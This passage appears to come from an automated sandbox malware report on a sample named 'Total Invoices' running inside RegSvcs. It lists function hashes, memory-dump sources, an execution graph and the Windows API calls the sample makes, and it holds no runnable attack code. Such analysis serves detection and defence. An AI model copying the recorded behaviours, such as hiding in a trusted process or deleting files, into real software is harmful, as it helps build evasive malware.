                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c6a600b3e5154184cc74c2594b7d92d6e3c17b96323f6b6ab339c54b6dc0e83
                                                                                        • Instruction ID: c50dca382209f2e9ea70fc15dc675e4198367d4dbedb3209bd49ddb7917856f0
                                                                                        • Opcode Fuzzy Hash: 0c6a600b3e5154184cc74c2594b7d92d6e3c17b96323f6b6ab339c54b6dc0e83
                                                                                        • Instruction Fuzzy Hash: 8EA13B36E0021A8FCF19DFB8D84499EBBF2BF85300B15856AE905AF265DF31E955CB40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADD63F Relevance: .1, Instructions: 133COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b85b5731d323ecac4edd8bc545326b628a5f75e016d7fc4e4863c4cd6c3320a2
                                                                                        • Instruction ID: eb4750861b8ee66d08cb8b060e3e96b73dc2ba430e54163671c1c32c3bb1abb7
                                                                                        • Opcode Fuzzy Hash: b85b5731d323ecac4edd8bc545326b628a5f75e016d7fc4e4863c4cd6c3320a2
                                                                                        • Instruction Fuzzy Hash: AB511AB4E112198BDB14CFA9C9805AEBBB2FF89304F24C1AAD419A7355D7309D42CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADCC8F Relevance: .1, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bfa4e1d03f0e769bb8bcb0c79de194fed50a6f51406039f993d6d411a6fac707
                                                                                        • Instruction ID: 31a6add4881075bf00d32fe854bd7db3ec634b7adc943bcd7ffc2d1364ed6aeb
                                                                                        • Opcode Fuzzy Hash: bfa4e1d03f0e769bb8bcb0c79de194fed50a6f51406039f993d6d411a6fac707
                                                                                        • Instruction Fuzzy Hash: 17510BB4E012198FDB14DFA9C9805AEFBF2BF89314F248169D419A7256D7305D42CF61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:11.2%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:173
                                                                                        Total number of Limit Nodes:17
                                                                                        execution_graph 38017 646b180 38018 646b1c2 38017->38018 38019 646b1c8 LoadLibraryExW 38017->38019 38018->38019 38020 646b1f9 38019->38020 38021 16f0848 38023 16f084e 38021->38023 38022 16f091b 38023->38022 38027 16f1390 38023->38027 38031 64616e8 38023->38031 38035 64616f8 38023->38035 38028 16f1393 38027->38028 38029 16f14b8 38028->38029 38039 16f7530 38028->38039 38029->38023 38032 64616f8 38031->38032 38052 64610d0 38032->38052 38036 6461707 38035->38036 38037 64610d0 4 API calls 38036->38037 38038 6461728 38037->38038 38038->38023 38040 16f753a 38039->38040 38041 16f7554 38040->38041 38044 647d6e8 38040->38044 38048 647d6f8 38040->38048 38041->38028 38045 647d6f8 38044->38045 38046 647d922 38045->38046 38047 647d938 GlobalMemoryStatusEx 38045->38047 38046->38041 38047->38045 38050 647d70d 38048->38050 38049 647d922 38049->38041 38050->38049 38051 647d938 GlobalMemoryStatusEx 38050->38051 38051->38050 38053 64610db 38052->38053 38056 646256c 38053->38056 38055 64630ae 38055->38055 38057 6462577 38056->38057 38058 64637d4 38057->38058 38061 6465060 38057->38061 38065 646505e 38057->38065 38058->38055 38062 6465081 38061->38062 38063 64650a5 38062->38063 38069 6465210 38062->38069 38063->38058 38067 6465060 38065->38067 38066 64650a5 38066->38058 38067->38066 38068 6465210 4 API calls 38067->38068 38068->38066 38070 646521d 38069->38070 38071 6465256 38070->38071 38073 6463574 38070->38073 38071->38063 38074 646357f 38073->38074 38076 64656c8 38074->38076 38077 6465268 38074->38077 38076->38076 38078 6465273 38077->38078 38084 6465278 38078->38084 38080 6465737 38088 646aa60 38080->38088 38096 646aa48 38080->38096 38081 6465771 38081->38076 38087 6465283 38084->38087 38085 64669c0 38085->38080 38086 6465060 4 API calls 38086->38085 38087->38085 38087->38086 38089 646aa65 38088->38089 38090 646aa9d 38089->38090 38104 646acd6 38089->38104 38109 646acd8 38089->38109 38090->38081 38091 646aadd 38113 646bfd8 38091->38113 38121 646bfc9 38091->38121 38097 646aa60 38096->38097 38098 646aa9d 38097->38098 38102 646acd6 3 API calls 38097->38102 38103 646acd8 3 API calls 38097->38103 38098->38081 38099 646aadd 38100 646bfd8 2 API calls 38099->38100 38101 646bfc9 2 API calls 38099->38101 38100->38098 38101->38098 38102->38099 38103->38099 38105 646acd8 38104->38105 38129 646ad18 38105->38129 38138 646ad28 38105->38138 38106 646ace2 38106->38091 38111 646ad18 2 API calls 38109->38111 38112 646ad28 2 API calls 38109->38112 38110 646ace2 38110->38091 38111->38110 38112->38110 38114 646c003 38113->38114 38147 646c530 38114->38147 38115 646c086 38116 6469ee0 GetModuleHandleW 38115->38116 38118 646c0b2 38115->38118 38117 646c0f6 38116->38117 38120 646cec5 CreateWindowExW 38117->38120 38120->38118 38122 646bfd8 38121->38122 38128 646c530 GetModuleHandleW 38122->38128 38123 646c086 38126 646c0b2 38123->38126 38152 6469ee0 38123->38152 38128->38123 38130 646ad1d 38129->38130 38131 6469ee0 GetModuleHandleW 38130->38131 38133 646ad5c 38130->38133 38132 646ad44 38131->38132 38132->38133 38137 646afb2 GetModuleHandleW 38132->38137 38133->38106 38134 646af60 GetModuleHandleW 38136 646af8d 38134->38136 38135 646ad54 38135->38133 38135->38134 38136->38106 38137->38135 38139 646ad2d 38138->38139 38140 6469ee0 GetModuleHandleW 38139->38140 38143 646ad5c 38139->38143 38141 646ad44 38140->38141 38141->38143 38146 646afb2 GetModuleHandleW 38141->38146 38142 646ad54 38142->38143 38144 646af60 GetModuleHandleW 38142->38144 38143->38106 38145 646af8d 38144->38145 38145->38106 38146->38142 38148 646c56d 38147->38148 38149 646c5ee 38148->38149 38150 646c6a0 GetModuleHandleW 38148->38150 38151 646c6b0 GetModuleHandleW 38148->38151 38150->38149 38151->38149 38154 646af18 GetModuleHandleW 38152->38154 38155 646af8d 38154->38155 38156 646cec5 38155->38156 38157 646cec9 38156->38157 38158 646cefd CreateWindowExW 38156->38158 38157->38126 38160 646d034 38158->38160 38160->38160 38163 16f7358 38164 16f739e DeleteFileW 38163->38164 38166 16f73d7 38164->38166 38167 164d01c 38169 164d034 38167->38169 38168 164d08e 38169->38168 38174 646d0b7 38169->38174 38178 646d0c8 38169->38178 38182 646e218 38169->38182 38191 646a0c4 38169->38191 38175 646d0c5 38174->38175 38176 646a0c4 CallWindowProcW 38175->38176 38177 646d10f 38176->38177 38177->38168 38179 646d0ee 38178->38179 38180 646a0c4 CallWindowProcW 38179->38180 38181 646d10f 38180->38181 38181->38168 38183 646e228 38182->38183 38184 646e289 38183->38184 38186 646e279 38183->38186 38187 646e287 38184->38187 38216 646a18c 38184->38216 38200 646e3a0 38186->38200 38205 646e47c 38186->38205 38211 646e3b0 38186->38211 38187->38187 38192 646a0cf 38191->38192 38193 646e289 38192->38193 38195 646e279 38192->38195 38194 646a18c CallWindowProcW 38193->38194 38196 646e287 38193->38196 38194->38196 38197 646e3a0 CallWindowProcW 38195->38197 38198 646e3b0 CallWindowProcW 38195->38198 38199 646e47c CallWindowProcW 38195->38199 38196->38196 38197->38196 38198->38196 38199->38196 38202 646e3ae 38200->38202 38201 646e450 38201->38187 38220 646e458 38202->38220 38224 646e468 38202->38224 38206 646e48a 38205->38206 38207 646e43a 38205->38207 38209 646e458 CallWindowProcW 38207->38209 38210 646e468 CallWindowProcW 38207->38210 38208 646e450 38208->38187 38209->38208 38210->38208 38212 646e3b2 38211->38212 38214 646e458 CallWindowProcW 38212->38214 38215 646e468 CallWindowProcW 38212->38215 38213 646e450 38213->38187 38214->38213 38215->38213 38217 646a197 38216->38217 38218 646f6ea CallWindowProcW 38217->38218 38219 646f699 38217->38219 38218->38219 38219->38187 38221 646e468 38220->38221 38222 646e479 38221->38222 38227 646f620 38221->38227 38222->38201 38225 646e479 38224->38225 38226 646f620 CallWindowProcW 38224->38226 38225->38201 38226->38225 38228 646f630 38227->38228 38229 646a18c CallWindowProcW 38228->38229 38230 646f63a 38229->38230 38230->38222 38161 6462a48 DuplicateHandle 38162 6462ade 38161->38162

                                                                                        Executed Functions

                                                                                        Function 0646AD28 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: f37a6bf64cb782d595eb7857c380637659585cf9c061a018d15d8d80ef86ec30
                                                                                        • Instruction ID: 16df27def96a45ad429c814dc0e954e901b45807e913bc0b16dddd78e7f7b651
                                                                                        • Opcode Fuzzy Hash: f37a6bf64cb782d595eb7857c380637659585cf9c061a018d15d8d80ef86ec30
                                                                                        • Instruction Fuzzy Hash: 68810370A00B058FD7A5DF2AD44475BBBF6FF88204F10892EE49A97B50D774E885CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0646CEC5 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0646D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 869857c76f01b53f8ca3985d26ca5bd5ca86359d0ef46fa86462abff79d160bb
                                                                                        • Instruction ID: 78bb2746500945ebb9c6eb36d95373919b6b92cb1428b2f3efbb06f38902ecdd
                                                                                        • Opcode Fuzzy Hash: 869857c76f01b53f8ca3985d26ca5bd5ca86359d0ef46fa86462abff79d160bb
                                                                                        • Instruction Fuzzy Hash: DB51D171D00249AFDF15CFAAC884ADEBFB6BF49314F14816AE818AB221D7719845CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0647E500 Relevance: 1.6, APIs: 1, Instructions: 136COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810543923.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6470000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 45a57c09972b2f933ea8247489ffb226cd812314520a602d4051948f593d42bb
                                                                                        • Instruction ID: 0fdd2a960224e2c64ed7c0d88a3da3b3b40ccbbf745ba141d3ae1c685504b982
                                                                                        • Opcode Fuzzy Hash: 45a57c09972b2f933ea8247489ffb226cd812314520a602d4051948f593d42bb
                                                                                        • Instruction Fuzzy Hash: 3C412571D143598FC704DFB9D8042EABFF5AF89310F1486ABD408A7291EB74A845CBE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0646CF04 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0646D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: 51e82c8fe75f9ed6bc73545538486fe2a53469ae096c9ba2b16a209fc26897c2
                                                                                        • Instruction ID: f00f69d9bd78684f459db0cf36314de7757828ddc5da2adbb0dd62015d052f78
                                                                                        • Opcode Fuzzy Hash: 51e82c8fe75f9ed6bc73545538486fe2a53469ae096c9ba2b16a209fc26897c2
                                                                                        • Instruction Fuzzy Hash: A951B1B1D00349DFDB14CFAAC884ADEBFB5BF49314F24812AE819AB250D7719845CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0646CF10 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0646D022
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateWindow
                                                                                        • String ID:
                                                                                        • API String ID: 716092398-0
                                                                                        • Opcode ID: e04dd462dcb66612eb545c983909b7ae774221acff3906be38fe6f941f7602d4
                                                                                        • Instruction ID: 73ada3d7875114f0fb227774bc7f260bef214ae4878413ddac8d4d983f49dc50
                                                                                        • Opcode Fuzzy Hash: e04dd462dcb66612eb545c983909b7ae774221acff3906be38fe6f941f7602d4
                                                                                        • Instruction Fuzzy Hash: 5641B0B1D00349DFDB14CFAAC884ADEBBB5FF48314F24812AE819AB250D7719845CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0646A18C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0646F711
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: CallProcWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2714655100-0
                                                                                        • Opcode ID: 4a1c66486ab7a4ad9b7603c4371fc4e5d804d3fa69e032f4f856f6c8e22e78fb
                                                                                        • Instruction ID: 617e88e3a877676bb79b56d0cac285236bd3cdd4c407b93827b9acdcaad1d923
                                                                                        • Opcode Fuzzy Hash: 4a1c66486ab7a4ad9b7603c4371fc4e5d804d3fa69e032f4f856f6c8e22e78fb
                                                                                        • Instruction Fuzzy Hash: B54149B4900205CFCB54DF9AC848AAABBF6FF88314F24C459E559AB321D774A845CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06462A40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06462ACF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 8cd063ad12ab1e8864507cb658a77e143a8f3b7d5a05c55a88c4e380373e64a8
                                                                                        • Instruction ID: d232f76b8a153eee9bf521bee7e1aed1aa3e230c164f6c5057eaf204d228c5f4
                                                                                        • Opcode Fuzzy Hash: 8cd063ad12ab1e8864507cb658a77e143a8f3b7d5a05c55a88c4e380373e64a8
                                                                                        • Instruction Fuzzy Hash: E121E4B5D00208AFDB10CFAAD984ADEFBF8EF48320F14841AE954A7310D374A950DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06462A48 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06462ACF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 0fc392ce534ac76b69215413ddff17366120af427904951c1f5e557d0a3b6c34
                                                                                        • Instruction ID: 8fc1e6ed7d90c47b23bdca177e7a47da1c828afc0caab204414cbc7311440139
                                                                                        • Opcode Fuzzy Hash: 0fc392ce534ac76b69215413ddff17366120af427904951c1f5e557d0a3b6c34
                                                                                        • Instruction Fuzzy Hash: C721E4B5900208AFDB10CF9AD984ADEFBF4EB48310F14841AE954A7310D374A940DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 016F7351 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 016F73C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804513608.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_16f0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: aaa84a59b22c0d0da7674f49b07f8cd31c028ab06e0ab19cc68ec77f637d9961
                                                                                        • Instruction ID: 40d90b811aad6e52452c4c31116d4fb415b1a9ff1ec23d0e460c46b4dc954084
                                                                                        • Opcode Fuzzy Hash: aaa84a59b22c0d0da7674f49b07f8cd31c028ab06e0ab19cc68ec77f637d9961
                                                                                        • Instruction Fuzzy Hash: 392135B2C006699FCB10CF9AC845BEEFBB4EF48320F148169D918A7350D334A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0646B17A Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0646B1EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 4ca2d2b1b7900fee21f64a46e2c936705592d320eb876885b0208bb43d2b592d
                                                                                        • Instruction ID: 582e3b077f735df7bdc448bcb9cd56b51bff8aa1a549d9a472319296113b88e1
                                                                                        • Opcode Fuzzy Hash: 4ca2d2b1b7900fee21f64a46e2c936705592d320eb876885b0208bb43d2b592d
                                                                                        • Instruction Fuzzy Hash: 7611D3B69002499FDB20CF9AD844ADFFFF8EB89710F10842AE419A7210C775A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 016F7358 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileW.KERNELBASE(00000000), ref: 016F73C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804513608.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_16f0000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile
                                                                                        • String ID:
                                                                                        • API String ID: 4033686569-0
                                                                                        • Opcode ID: d76d5ac6624c98b6ed872375763da7af415725958479dbe5003f8ed4d6b95dfa
                                                                                        • Instruction ID: 555a1837cecd5c1bdfc259c2f8761b1b06fe938be3e275035c94ac2e0a4dc6b6
                                                                                        • Opcode Fuzzy Hash: d76d5ac6624c98b6ed872375763da7af415725958479dbe5003f8ed4d6b95dfa
                                                                                        • Instruction Fuzzy Hash: 8A1136B2C006199BDB14CF9AD545BAEFBF4EF48320F10812AD918A7250D338A940CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0646B180 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 0646B1EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 659e88146962114a26060508e1ee007a2e6915cae971f2b70bd5a8ba2ca4ede7
                                                                                        • Instruction ID: 6cd597cb7c76b0fe0c516fb1de3c7b0d09e624293a94ef6434810b28e56cdbd6
                                                                                        • Opcode Fuzzy Hash: 659e88146962114a26060508e1ee007a2e6915cae971f2b70bd5a8ba2ca4ede7
                                                                                        • Instruction Fuzzy Hash: 2F11F3B6D002099FDB10CF9AD844ADEFBF4EF48310F10842AE419A7210C375A545CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0647E5E8 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0647E64F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810543923.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6470000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: 7ec9a5699f674557d24734fbc96a83b5c52f73ad4cbc98f0c2e954972c912f2d
                                                                                        • Instruction ID: e585ba85b2b43ed66a3e130eb11a5238348da2fe4ddda15be2813b106053de89
                                                                                        • Opcode Fuzzy Hash: 7ec9a5699f674557d24734fbc96a83b5c52f73ad4cbc98f0c2e954972c912f2d
                                                                                        • Instruction Fuzzy Hash: FF11EFB1C006699BCB10DF9AC544BDEFBF4AF48324F14816AE918A7250D378AA44CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06469EE0 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0646AD44), ref: 0646AF7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1810467919.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_6460000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: a4f076915cc03cfafb58a3e41ab0db19bfbcaec56a670a429f7e8b80b039987b
                                                                                        • Instruction ID: 3344eb53bcebc5014b342c59ec321e74b9286d636481780982182098e6998758
                                                                                        • Opcode Fuzzy Hash: a4f076915cc03cfafb58a3e41ab0db19bfbcaec56a670a429f7e8b80b039987b
                                                                                        • Instruction Fuzzy Hash: D211F0B5D006498FDB14DF9AC444A9EFBF5EF48214F10842AE829B7210D379A585CFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0142D124 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1803879835.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_142d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c18797933601af831f6233a4ee6bbcd07560f850aaa6e4358d73ce0baafba940
                                                                                        • Instruction ID: bb0d27e08096b893c232ed937c11ed355fa4ee0d30f39bef1271899f0a0dccdb
                                                                                        • Opcode Fuzzy Hash: c18797933601af831f6233a4ee6bbcd07560f850aaa6e4358d73ce0baafba940
                                                                                        • Instruction Fuzzy Hash: 1D2133B1900240DFDB05DF98C9C0B27BF65FB84314F70C26AE9090A766C336D486C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0164D01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804119338.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_164d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1b96f1bf256db7f3ebde1fa1c7ccd46562e19e521eb0560dd735f1e9865feaa7
                                                                                        • Instruction ID: 98e22e39a5fa1743a736ab6a364f5fa2006cd71158779da4a0ec6ac00df9eba4
                                                                                        • Opcode Fuzzy Hash: 1b96f1bf256db7f3ebde1fa1c7ccd46562e19e521eb0560dd735f1e9865feaa7
                                                                                        • Instruction Fuzzy Hash: 18213471A04200DFCB15DF98D9C4B26BFA5FB94B14F20C56DD80A4B396C33AD447CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0142D11F Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1803879835.000000000142D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0142D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_142d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction ID: 85b4cd0fc2eaf6ad70428f164f99cf4c3b9d70502044eefdb26d6c4f2ebd0316
                                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                        • Instruction Fuzzy Hash: 2211E176804280CFCB06CF44D9C4B26BF71FB84324F24C5AADC090B666C336D45ACBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0164D017 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.1804119338.000000000164D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0164D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_164d000_RegSvcs.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                        • Instruction ID: ff34c2e66364a978581a595e633778a17d1281cef81f938bd26a2a831a3ded09
                                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
